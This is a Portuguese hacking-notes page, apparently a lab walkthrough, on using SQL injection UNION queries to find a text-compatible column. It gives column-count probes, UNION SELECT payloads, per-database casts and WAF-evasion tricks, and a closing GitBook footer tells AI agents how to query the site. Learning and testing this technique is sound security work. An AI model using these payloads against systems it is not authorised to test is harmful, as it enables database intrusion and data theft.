> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/pt-br/web/sql-injection/union-attack-to-find-a-text-compatible-column.md).

# Ataque UNION para encontrar uma coluna compatível com texto

### Ataque UNION de Injeção SQL, Encontrando uma Coluna que Contém Texto

**Objetivo:** insira uma `UNION` linha contendo o valor de teste (`PjNkGQ`) para identificar qual coluna aceita strings e, em seguida, extrair dados de texto.

#### (1) Confirmar o Número de Colunas (se ainda não for conhecido)

* Teste com `ORDER BY` incremental:

  ```sql
  ' ORDER BY 1-- -
  ' ORDER BY 2-- -
  ' ORDER BY 3-- -
  ```

Quando `ORDER BY N` causa um erro, o número de colunas é `< N`.

#### (2) Injete uma `UNION` linha contendo o valor fornecido

* Exemplo para **3 colunas**:

  ```sql
  ' UNION SELECT NULL, 'PjNkGQ', NULL-- -
  ```

— se a resposta mostrar `PjNkGQ`, o **2ª coluna** é compatível com texto.

#### (3) Variantes para Localizar a Coluna Visível

* Teste a constante em cada posição:

  ```sql
  ' UNION SELECT 'PjNkGQ', NULL, NULL-- -
  ' UNION SELECT NULL, NULL, 'PjNkGQ'-- -
  ```
* Use constantes separadas para mapear as colunas visíveis:

  ```sql
  ' UNION SELECT 'A','B','C'-- -
  ```

#### (4) Gerenciar Erros de Tipo

* Se `UNION` falhar por incompatibilidade de tipo, use `NULL` para colunas não textuais ou faça o cast da constante de acordo com o SGBD:
* **MySQL / PostgreSQL**:

  ````
  ```sql
  ' UNION SELECT NULL, CAST('PjNkGQ' AS CHAR), NULL-- -
  ```
  ````

  * **MSSQL** :

    ```sql
    ' UNION SELECT NULL, CAST('PjNkGQ' AS VARCHAR(8000)), NULL-- -
    ```
  * **Oracle** :

    ```sql
    ' UNION SELECT NULL, TO_CHAR('PjNkGQ'), NULL-- -
    ```
* Se algumas colunas exigirem tipos numéricos, deixe `NULL` para elas e coloque o texto apenas na coluna candidata.

#### (5) Se um WAF / filtro bloquear `UNION`

* Altere comentários / espaçamento: `-- -`, `--`, `/*... */`.
* Construa a cadeia por meio de funções (por ex., `CONCAT('P','jNkGQ')`) para contornar a normalização rígida.

#### (6) Resultado Esperado

* A resposta contém `PjNkGQ` → coluna de texto identificada. A partir daí, construa `UNION SELECT` para enumeração (tabelas/colunas/dumps).


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/pt-br/web/sql-injection/union-attack-to-find-a-text-compatible-column.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
